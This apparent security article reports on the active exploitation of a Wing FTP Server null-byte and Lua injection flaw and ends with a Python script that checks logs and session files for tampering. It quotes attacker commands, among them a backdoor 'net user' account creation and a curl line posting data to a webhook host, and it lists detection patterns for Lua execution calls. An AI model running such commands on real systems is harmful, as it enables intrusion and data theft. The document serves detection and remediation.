On July 1, 2025—just a day after its public disclosure—Huntress witnessed the active exploitation of a critical remote code execution (RCE) vulnerability in Wing FTP Server. Tracked as CVE-2025-47812, this flaw combines the potency of null byte injection and Lua code execution to deliver root or SYSTEM-level access to attackers.
At the heart of the flaw is how Wing FTP mishandles null bytes in the username parameter, particularly in requests to loginok.html, which is responsible for handling authentication. Huntress explains:
“An attacker can perform Lua injection after using the null byte in the username parameter,” disrupting string processing and allowing injection of malicious code.
The exploit chain involves logging in (even anonymously), appending a %00 null byte to the username, injecting Lua code, and then triggering deserialization by visiting another page like dir.html. The result? Arbitrary code execution via session manipulation.
Huntress analysts first spotted the exploit in the wild on July 1, 2025. Using their telemetry and EDR tooling, they observed exploitation under the WFTPServer.exe process. Evidence was found in session files and log entries—such as this truncated line in the logs:
User ‘anonymous
“Note the missing closing quote—this is the null-byte breaking the entry in the log file.”
But the clear evidence came from tampered Lua session files. One such file included this payload:
Once decoded, the hex-encoded blob revealed the attacker’s true intent:
This command downloads and executes malware on the victim host, leveraging certutil.
The attack timeline is a case study in both persistence and amateur mistakes. Huntress observed at least five different threat actors targeting the same vulnerable system within a single day. Commands like net user wingftp 123123qweqwe /add were used to create new users, while reconnaissance activity included:
- ipconfig
- arp -a
- whoami /priv
- curl -s -d con https://webhook[.]site/…
One attacker even typed c:^A.exe, accidentally injecting a SOH (Start of Heading) control character into their command—effectively sabotaging their own payload. Huntress quipped:
“It’s unclear how or why they even managed to type that out.”
Despite their comedic errors, the threat remained real. Eventually, one attacker tried to install ScreenConnect for persistent access. Fortunately, Microsoft Defender intervened, flagging and deleting the file as Trojan:Win32/Ceprolad.A, shortly before WFTPServer.exe crashed—bringing the attack to a halt.
Wing FTP Server versions prior to 7.4.4 are vulnerable. If you’re running this software:
- Update immediately to version 7.4.4 or newer.
- Review log files in: C:\Program Files (x86)\Wing FTP Server\Log\Domains\
- Audit session files in: C:\Program Files (x86)\Wing FTP Server\session\
Pay close attention to session files with anomalous sizes or embedded Lua functions.
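As an added triage example (not Huntress's or Wing FTP's code), the Python below applies the two review steps above to constructed sample data: it flags the unterminated `User '` log entry that the null byte leaves behind, and session files that carry Lua function definitions or long hex-encoded strings. The 4096-byte size baseline and the sample log and session contents are assumptions, not values from the report.

```python
import re
from pathlib import Path

# Session directory named in the article's remediation guidance (Windows default install).
SESSION_DIR = Path(r"C:\Program Files (x86)\Wing FTP Server\session")

# A 'User ...' field whose opening quote is never closed on the same line: the null
# byte in the username truncates the log entry exactly this way, per the article.
TRUNCATED_USER = re.compile(r"User\s+['‘][^'’]*$")
# Lua constructs that a plain key/value session record should never contain.
LUA_TOKENS = re.compile(r"\b(function|os\.execute|io\.popen|load|loadstring|dofile)\b")
# A long run of hex digits, the encoding the article saw used for the payload.
HEX_BLOB = re.compile(r"\b[0-9a-fA-F]{32,}\b")

def find_truncated_logins(lines: list[str]) -> list[str]:
    """Return log lines whose User '...' field opens a quote but never closes it."""
    return [ln for ln in lines if TRUNCATED_USER.search(ln)]

def session_findings(content: str, size_limit: int = 4096) -> list[str]:
    """Reasons a session file looks tampered with; an empty list means nothing flagged."""
    # size_limit is an assumed baseline, not a vendor value; tune it against known-good files.
    findings = []
    if len(content.encode("utf-8", "replace")) > size_limit:
        findings.append(f"size exceeds baseline of {size_limit} bytes")
    tokens = sorted({m.group(1) for m in LUA_TOKENS.finditer(content)})
    if tokens:
        findings.append("lua tokens: " + ", ".join(tokens))
    if HEX_BLOB.search(content):
        findings.append("long hex-encoded string")
    return findings

def scan_session_dir(directory: Path = SESSION_DIR) -> dict[str, list[str]]:
    """Map each flagged session file under directory to its list of findings."""
    results = {}
    for path in directory.iterdir():
        if path.is_file():
            found = session_findings(path.read_text(errors="replace"))
            if found:
                results[path.name] = found
    return results

# Constructed samples (not data from the Huntress report) used to exercise the checks.
SAMPLE_LOG_LINES = ["[2025-07-01 10:00:00] User 'alice' logged in from 192.0.2.10",
                    "[2025-07-01 10:00:05] User 'anonymous"]
SESSION_BENIGN = "username = 'alice'\nip = '192.0.2.10'\n"
SESSION_TAMPERED = ("username = 'anonymous'\n"
                    "cb = function() os.execute('" + "41" * 32 + "') end\n")
```

Run `scan_session_dir()` on the server itself, and feed each domain log under the Log\Domains path to `find_truncated_logins`; any hit warrants treating the host as compromised rather than merely vulnerable.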